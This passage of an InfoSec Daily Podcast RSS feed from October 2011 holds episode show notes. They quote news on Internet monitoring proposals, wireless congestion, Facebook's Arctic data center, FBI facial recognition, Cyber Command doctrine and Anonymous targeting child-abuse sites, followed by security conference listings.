<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are other problems that will make this approach unworkable. Already people are accessing the Internet increasingly through mobile devices and e-readers; that presumably means that these too will require black boxes to track users&#39; every online move. In the longer term, we are moving to an Internet of things, which means that many objects in our home will have an IP address and be hooked up to the Net: does that mean there will be a black box for our toasters, perhaps?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And then there is the fact that a 2 Terabyte portable external hard drive costs around $100, making the sharing of vast numbers of files trivial even without the Internet. Do we add black boxes to hard drives? What about USB drives?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What&#39;s worrying is that a politician can be naive enough to believe that solving this complex problem is really as easy as adding a few lines of code to an operating system &ndash; and that he hopes to convince the European Parliament to mandate such a thing. Far better to stop invoking the &quot;think of the children&quot; mantra as a way to short-circuit rational discussion and instead to encourage a rational, mature debate about how these serious problems can be solved with real-world solutions. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://hmi.ucsd.edu/wireless_disconnect_2011_10_26.php"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hmi.ucsd.edu/wireless_disconnect_2011_10_26.php</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new report is out today from the Global Information Industry Center at the University of California at San Diego. The paper and its author, UCSD fellow and infrastructure expert Michael Kleeman, lay out some dizzying figures on the growing stresses placed on mobile networks&#8211;including those below and in the box to the right.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To keep up with demand, U.S. wireless networks have traditionally doubled their capacity every 30 months, but this trend may not keep up with future demand&#8230; the volume of data traffic on U.S. networks is expected to increase by 1,800 percent over the next four years.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report says the inevitable result of demand outstripping capacity so dramatically will be painful network congestion.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report says the inevitable result of demand outstripping capacity so dramatically will be painful network congestion.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We must understand and accept the trade-offs we will face for the convenience of accessing limited wireless capacity,&quot; report author Kleeman says in a statement. &quot;Alternatively, as citizens we need to dramatically lower our expectations for wireless services in the future.&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yikes. This guy actually expects we Americans to lower our expectations? We have to rewind the technological advances of the past decade and go back to the days when we spent half of our commuting time buffering YouTube videos? Re-embrace the Edge network?</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/t/data-center/free-cooling-lures-facebook-arctics-edge-177233"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/t/data-center/free-cooling-lures-facebook-arctics-edge-177233</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a move that will further bolster Facebook&#39;s green data center credentials, the social networking giant plans to build an enormous new 120MW data center in Lule&aring;, Sweden, just 62 miles south of the Arctic Circle. The company will make the official announcement Thursday, according to the Telegraph.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The allure of the locale is three-fold: First, it&#39;s a prime location for taking advantage of free cooling &#8212; that is, using outside air to chill machines instead of running costly CRAC (computer room air conditioner) units 24/7. Second, dams on the Lule&aring; river generate an abundance of renewable electricity &#8212; enough so that half is exported &#8212; so Facebook needn&#39;t worry about an energy shortfall any time soon. Third, Sweden has a dense fiber-optic network, which means data can flow reliably and easily through Finland and on into Eastern Europe and Russia.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the past few years now, organizations have struggled with strategies to cut costs and energy consumption within their data centers. Free cooling has proven a paricularly desirable technique as the cost of generating artificially chilled air can be quite considerable. Facebook employs free cooling at its data center in Prineville, Ore., for example, though the AC sometimes needs to be turned on during the summer. That contributes to the facility&#39;s remarkably low PUE (Power Utilization Effectiveness); Facebook claims the figure is 1.07.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-504-end-of-anonymity-18-chrome-bugs-black-box-os-wireless-disconnect-arctic-chill/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3023/0/infosec-daily-podcast-episode-504.mp3" length="23753737" type="audio/mpeg" />
		<itunes:duration>0:34:14</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 504 for October 26, 2011. &#160;Tonight&#39;s podcast is hosted by Boris Sverdlik, Geordy Rostad, and Varun Sharma.
	Announcements:
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 504 for October 26, 2011. &#160;Tonight&#39;s podcast is hosted by Boris Sverdlik, Geordy Rostad, and Varun Sharma.
	Announcements:
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.eff.org/deeplinks/2011/10/fbi-ramps-its-next-generation-identification-roll-out-winter-will-your-image-end
	NextGov.com is reporting that the FBI will begin rolling out its Next Generation Identification (NGI) facial recognition service as early as this January. &#160;Once NGI is fully deployed and once each of its approximately 100 million records also includes photographs, it will become trivially easy to find and track Americans.
	As we detailed in an earlier post, NGI expands the FBI&#8217;s IAFIS criminal and civil fingerprint database to include multimodal biometric identifiers such as iris scans, palm prints, photos, and voice data. The Bureau is planning to introduce each of these capabilities in phases (pdf, p.4) over the next two and a half years, starting with facial recognition in four states&#8212;Michigan, Washington, Florida, and North Carolina&#8212;this winter.
	Despite the FBI&#8217;s claims to the contrary, NGI will result in a massive expansion of government data collection for both criminal and noncriminal purposes. IAFIS is already the largest biometric database in the world&#8212;it includes 70 million subjects in the criminal master file and more than 31 million civil fingerprints. Even if there are duplicate entries or some overlap between civil and criminal records, the combined number of records covers close to 1/3 the population of the United States. When NGI allows photographs and other biometric identifiers to be linked to each of those records, all easily searchable through sophisticated search tools, it will have an unprecedented impact on Americans&#39; privacy interests.
	Although IAFIS currently includes some photos, they have so far been limited specifically to mug shots linked to individual criminal records. However, according to a 2008 Privacy Impact Assessment for NGI&#8217;s Interstate Photo System, NGI will allow unlimited submission of photos and types of photos. Photos won&#8217;t be limited to frontal mug shots but may be taken from other angles and may include close-ups of scars, marks and tattoos. NGI will allow all levels of law enforcement, correctional facilities, and criminal ju[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 503 &#8211;  Rules of Engagement, Anonymous Targets, THC SSL, Mitsubishi Leak , MacBook Pro &amp; WAM</title>
		<link>http://www.isdpodcast.com/episode-503-rules-of-engagement-anonymous-targets-thc-ssl-mitsubishi-leak-macbook-pro-wam</link>
		<comments>http://www.isdpodcast.com/episode-503-rules-of-engagement-anonymous-targets-thc-ssl-mitsubishi-leak-macbook-pro-wam#comments</comments>
		<pubDate>Wed, 26 Oct 2011 00:48:56 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3013</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 503 for October 25, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Themson Mester. Announcements: NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia http://nordsec2011.cyber.ee/ New Hampshire InfoSec Tweetup When: October 29, 2011 Where: Pawtuckaway State Park in Nottingham, NH http://nhinfosectweetup.eventbrite.com/ ( It is [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 503 for October 25, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Themson Mester.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.defense.gov/news/newsarticle.aspx?id=65739"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.defense.gov/news/newsarticle.aspx?id=65739</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New doctrine under review by the Joint Staff will lay out rules of engagement against an attack in cyberspace, the commander of U.S. Cyber Command said today.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The doctrine, once adopted, will help to define conditions in which the military can go on the offensive against cyber threats and what specific actions it can take, Army Gen. Keith B. Alexander told reporters at an International Systems Security Association conference here.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It will support the Defense Department&rsquo;s strategy for operating in cyberspace, released in July, and President Barack Obama&rsquo;s international cyberspace strategy, the general added.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the doctrine is approved, Cyber Command will put out guidance to its cyber warriors spelling out, &ldquo;Here is how we operate in cyberspace,&rdquo; and tailor its training accordingly, Alexander said. In the meantime, the laws of land warfare and law of armed conflict apply to cyberspace, he said. The challenge, he explained, is how to translate laws that govern physical space to cyberspace &ndash; now a fifth domain of conflict.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;That is what the Defense Department and others are working right now: to come up with the standing rules of engagement and those different parts,&rdquo; he said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Among issues the Defense Department is considering, Alexander said, is what constitutes a war in cyberspace.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The United States also must determine what represents a reasonable and proportional response to a cyber attack, he said. The law of armed conflict authorizes a reasonable, proportional defense against a physical attack from another country. Extending that logic to cyberspace, Alexander said, it remains unclear if it includes authority to shut down a computer network, even if it&rsquo;s been taken over by a malicious cyber attacker intent on destruction.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If it does, also left unanswered so far is who would have that authority: the FBI, the National Security Agency, the military, the Internet service provider or another entity.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;That is something policymakers are going to have to tell us: &lsquo;Here is what you are authorized to do,&rsquo;&rdquo; Alexander said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The way doctrine, laws, policy and standing rules of engagement address these and other issues will shape how the military trains its cyber warriors, the general said. Current training focuses predominantly on ways to secure DOD networks, Alexander said, but he added that he expects that training to broaden to include more &ldquo;full-spectrum&rdquo; operations against threats.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber Command will &ldquo;train our force to the standard and ensure that we do it exactly right,&rdquo; he said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Alexander emphasized the importance of that capability against a growing array of ever-more-dangerous cyber threats.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I think that nation states, non-nation state actors and hacker groups are creating tools that are increasingly more persistent and threatening, and we have to be ready for that,&rdquo; he said. &ldquo;So the security frameworks we are putting in place are forward-looking, based on what we are seeing.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.techworld.com/security/3312970/anonymous-targets-online-paedophiles"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3312970/anonymous-targets-online-paedophiles</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacker collective Anonymous is at it again, and this time it is targeting websites that allow users to share child porn.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group took credit for shutting down more than 40 websites at the weekend used for sharing such material. It also said it exposed information about more than 1500 users, ZDNet reported.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a</span><a href="http://pastebin.com/T1LHnzEW"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">timeline of events</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> posted on text-storing website Pastebin, some Anonymous members stumbled upon a child pornography index while browsing a part of the internet mostly used for illegal peer-to-peer file sharing that isn&#39;t seen by search engines and can&#39;t be accessed without a special browser. They then tracked most of the sites listed to a shared hosting server.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
